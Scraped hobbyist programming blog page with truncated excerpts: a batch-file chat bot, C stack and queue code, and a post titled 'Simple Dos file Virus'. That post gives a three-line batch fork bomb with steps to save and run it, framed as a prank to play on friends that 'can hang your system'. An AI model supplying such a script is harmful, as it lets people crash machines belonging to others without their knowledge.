You feel excited to learn computer languages

Then you are at the right place. Computer languages are most fun thing you have ever seen. Use this excellent languages and have a nice future...

Monday, October 4, 2010

BOT made of Batch file

Hello to all. This simple Batch file you can use as a talking BOT. Here is the code.  ------------------------------------------------------------------------------------------@echo offecho Hello friend. I am your talking robot. Press F6 and enter after each input. Jecho What is your name?copy con tempclsecho Hellotype temp echo How old are you?copy con tempclsecho ok. you aretype tempecho years echo Bunny is my best friend. Who is your?copy con tempclsecho I also like to meettype temp echo bye now. See you later. :)del temp ------------------------------------------------------------------------------------------ As...

Simple Dos file Virus

Hello folks. Dos is always a great fun. Here I present a 3 lines code that can hang your system once you run the batch file. This file can be used as a fun trick with your friends. With little more addition with it, you can make this work like a virus too.Here is the code--------------------------------------------------- :lStart cmdGoto l--------------------------------------------------- How to make this1.Open Notepad. Then type the code.2. Save it by the extension called .bat. e.g “virus.bat”.3. Then just double click it. Your system will halt....

Implements Queue in C language

C language is always very useful to implements data structure. This program will be highly helpful for the students and professional to use queue using C language. #include <stdio.h> #include<stdlib.h> #define MAX 9 void push(int queue[],int *front,int *rear,int item) {  if((*front==0 && *rear==MAX) || (*rear+1==*front))  {   printf("\nOver Flow.....");   return;  }  else if(*front==-1)  {   *front=0;   *rear=0;  }  else if(*rear==MAX)  {   *rear=0;  }  else  {   *rear=*rear+1;  }  queue[*rear]=item; } int...

Advance Stack Using C language

Stack using C language with advance options. #include <stdio.h> #include<stdlib.h> #define MAX 9 void push(int stack[],int *top,int item) {  if(*top==MAX)  {   printf("\nOver Flow.....");   return;  }  else  {   *top=*top+1;   stack[*top]=item;  } } int pop(int stack[],int *top) {  int a;  if(*top==-1)  {   printf("\nUnder flow......");   return -1;  }  else  {   a=stack[*top];   *top=*top-1;   return...

Stack using C Language

This is a very simple stack progam using C language #include <stdio.h> #include<stdlib.h> #define MAX 9 int stack[10]; int top=-1; void push(int item) {  if(top==MAX)  {   printf("\nOver Flow.....");   return;  }  else  {   top=top+1;   stack[top]=item;  } } int pop() {  int a;  if(top==-1)  {   printf("\nUnder flow......");   return -1;  }  else  {   a=stack[top];   top=top-1;   return...